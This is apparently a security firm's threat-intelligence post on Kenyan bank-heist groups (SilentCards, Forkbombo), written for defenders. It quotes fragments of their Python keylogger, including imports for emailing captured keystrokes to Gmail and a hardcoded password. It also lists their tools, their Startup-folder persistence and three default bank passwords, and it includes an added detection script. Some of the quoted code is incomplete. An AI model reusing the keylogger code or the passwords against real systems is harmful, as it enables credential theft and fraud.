Tracking the 400 million shillings AFT – SilentCards' big comeback.


Our CNO team, which is selectively tasked with offensive operations to gather CTI for our customers so as to arm them with the most accurate intelligence, stumbled in early 2018 on a server that was used for a large heist late last year, in which the actor made a payday of more than 400,000,000 KSh. Because the institution is not our client, has not directly or indirectly contacted us to approve this post, and the laws of Kenya do not allow us to name it, we cannot name the affected institution; instead we provide details of how such a heist occurs according to our research, observations and intelligence collection.

Threat Intelligence

The SilentCards threat actor is a home-grown AFT and an offshoot of the Forkbombo Group. They started their robberies late in 2017 and have been heisting organizations for the last year, with many millions lost. This group inherited the old version of the key logger used by Forkbombo and perfected it for collecting key logger data in a targeted environment.

The latest code used in several banks, after reversing, has OnKeyboardEvent() as its main def, and the file is usually saved up as

def OnKeyboardEvent(event):
    # wg is the win32gui module; LOG_TEXT is the buffer the rest of the
    # file accumulates and later writes out (Python 2 code as recovered)
    LOG_NEWACTIVE = wg.GetWindowText(wg.GetForegroundWindow())
    LOG_TEXT += " " + LOG_NEWACTIVE + " |\n"
    LOG_TEXT += "=" * len(LOG_NEWACTIVE) + "===\n\n"
    print LOG_NEWACTIVE

The second part specifies where the logged files are written; by default SilentCards saves them in the UserProfile, as seen below, with tar.gz as an extension to fool inexperienced analysts.

now =
COMPUTER_NAME= socket.gethostname()+" "+ socket.gethostbyname(socket.gethostname()) + ": "

By default you will find these outputs in the home directory of the logged-in user, since the logger starts whenever that user logs into their system.

The logger PE is usually copied and saved into the Startup folder, which is an older TTP that the ForkBombo group used back in 2015-2017 and then abandoned in favour of Scheduled Tasks, the Registry and Drivers for persistence.

SilentCards still saves them in the startup directory as:

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\PE.File.Executable
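To hunt for the two artifacts described above (the plain-text keylog disguised as a .tar.gz in the user profile, and a PE dropped into the all-users Startup folder), here is an added defender-side example that is not part of the original post or the group's tooling. It checks file magic bytes rather than extensions, and the profile and Startup paths are parameters (on a live host they would be C:\Users and the Startup path above; the sample tree it builds is constructed data).

```python
import gzip
import tempfile
from pathlib import Path
from typing import Dict, List

GZIP_MAGIC = b"\x1f\x8b"  # real gzip data starts with these two bytes
PE_MAGIC = b"MZ"          # DOS stub header of a Windows PE file

def is_fake_archive(path: Path) -> bool:
    """True when a *.tar.gz file lacks the gzip magic, i.e. it is the plain-text
    keylog described in the post rather than a real archive."""
    with path.open("rb") as fh:
        return fh.read(2) != GZIP_MAGIC

def find_fake_tar_gz(profile_root: Path) -> List[str]:
    """Walk every profile below profile_root (C:\\Users on a live host)."""
    return sorted(p.relative_to(profile_root).as_posix()
                  for p in profile_root.rglob("*.tar.gz")
                  if p.is_file() and is_fake_archive(p))

def find_startup_pe(startup_dir: Path) -> List[str]:
    """Files in the all-users Startup folder that begin with a PE header."""
    hits = []
    for p in (sorted(startup_dir.iterdir()) if startup_dir.is_dir() else []):
        if p.is_file():
            with p.open("rb") as fh:
                if fh.read(2) == PE_MAGIC:
                    hits.append(p.name)
    return hits

def build_sample_tree(root: Path) -> Dict[str, Path]:
    """Constructed sample data so the hunt runs offline; not a real capture."""
    users = root / "Users"
    (users / "alice").mkdir(parents=True)
    (users / "bob").mkdir(parents=True)
    # keylog disguised as an archive: text in the window-title format shown above
    (users / "alice" / "alice.tar.gz").write_text("Untitled - Notepad |\n====\n\n")
    with gzip.open(users / "bob" / "backup.tar.gz", "wb") as gz:  # genuine archive
        gz.write(b"real archive payload")
    startup = root / "ProgramData/Microsoft/Windows/Start Menu/Programs/StartUp"
    startup.mkdir(parents=True)
    (startup / "PE.File.Executable").write_bytes(b"MZ\x90\x00" + b"\x00" * 60)
    (startup / "desktop.ini").write_text("[.ShellClassInfo]\n")  # benign, not flagged
    return {"users": users, "startup": startup}

def hunt_sample() -> Dict[str, List[str]]:
    """Build the sample tree in a temp dir and run both hunts over it."""
    with tempfile.TemporaryDirectory() as tmp:
        paths = build_sample_tree(Path(tmp))
        return {"fake_archives": find_fake_tar_gz(paths["users"]),
                "startup_pe": find_startup_pe(paths["startup"])}
```

Calling hunt_sample() flags only alice's text file and the MZ-headed Startup entry; the genuine backup.tar.gz and desktop.ini pass.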

In short, SilentCards have not improved their operations to defend their tactics in the long run, but there was a time when our Defenders ended up in a firefight with SilentCards as they tried to defend a module they used for CnC during a Breach Readiness service.

SilentCards are known to use AnyDesk for remote administration and have used GoToMyPC since 2015. Combined with PsExec, they move laterally through the ICT workstations deploying the key logger, and through the data centers dumping passwords and other essential access tokens with the open source tool mimikatz.

Our CNO team observed as they collected Windows credentials and later targeted Card Center servers, looking for the server owners and collecting their SSHD credentials. Most organizations have default passwords they set up for users, and at this bank three different default passwords were in use:

a) admin123

b) welcome1

c) secret123

SilentCards was also interested in the initial entry into boxes called Polarisprapp01 and Eqc-VC01. Using these two servers, just like their sister threat actor, the Forkbombo group, they started copying all Audit Reports generated by the institution from the auditors' workstations, to review the institution's situational awareness and risk analysis, and copied them via Eqc-VC01, an internal server, to a C2 server overseas.

After collecting as many credentials as they could, 400 million Kenya Shillings was moved in batches, crediting fictitious accounts that were then accessed either via VISA/MASTERCARD overseas or with Mobile Money Transfers. Unlike Forkbombo, which has several money mules, SilentCards relies heavily on foreigners for quick transactions outside the country.

Outlook on SilentCards

We believe this threat actor is still active in different infrastructures and is planning to attack another institution this Easter by running huge transactions. By raising community awareness, we intend to minimize damage and loss to your customers and ours by maiming their activities and capabilities when they exploit infrastructures across East Africa.

Understanding the Adversaries: The Forkbombo group.

The Forkbombo code-name of this threat actor was derived from a toolkit they used back in 2016-2017 to send keylogger data after infecting an institution. The email was

This is a home-grown cyber threat actor that has been active since 2015 and has grown into a huge cartel made up of money launderers, hackers, coders, operators and insiders. This adversary represents a constant threat to a wide variety of institutions, mostly in the banking sector around Kenya and its neighboring countries.

This threat actor is known to specialize in Python scripts to create quick tools for the exploitation phase in an environment. They are also known to use open source tools like Empire, Metasploit, DeathStar, BloodHound, CrackMapExec, Aesshell, XmultiShell, CHAOS, Katoolin etc.

Their initial keylogger was written by a student who later became a bigger player in the group; the mail receiver of the keylogger data, which he registered in 2016, is as below:

import pythoncom, pyHook, sys, logging, socket, datetime, os, win32gui, time
import smtplib
from email.MIMEMultipart import MIMEMultipart
from email.MIMEBase import MIMEBase
from email.MIMEText import MIMEText
from email import Encoders
global MAIL_SENT
gmail_user = ""
gmail_pwd = "mlimani_25891011"
now =
COMPUTER_NAME = socket.gethostname() + " " + socket.gethostbyname(socket.gethostname()) + ": "

This email was used in a lot of money heists around Nairobi before they changed to and later for further attacks. Whenever the keylogger generated its data, a file with the extension .tar.gz was saved in the user's UserProfile, with the username as the name of the file. When we responded to institutions with a Forkbombo malware infestation, we would find servers and workstations full of these text files with that extension.

A reversed keylogger snapshot of the old Forkbombo’s logger that sent data to a Gmail account.

In 2017, several key leaders of the Forkbombo group were arrested in a safehouse they used in Yaya center, with several hackers disappearing into the woods and splitting into two groups.

The OnNet team pursues them and has code-named these threat actors SilentCards and GrapZone for attribution. In 2018, GrapZone members, including money mules, joined back together and a new, bigger Forkbombo group was formed.

In the coming months, the OnNet team will share deeper CTI on these groups and why they are currently in a dispute and on opposing sides.

OnNet pays special attention to these intruders and is currently pursuing other Advanced Financial Threats that are targeting our customers.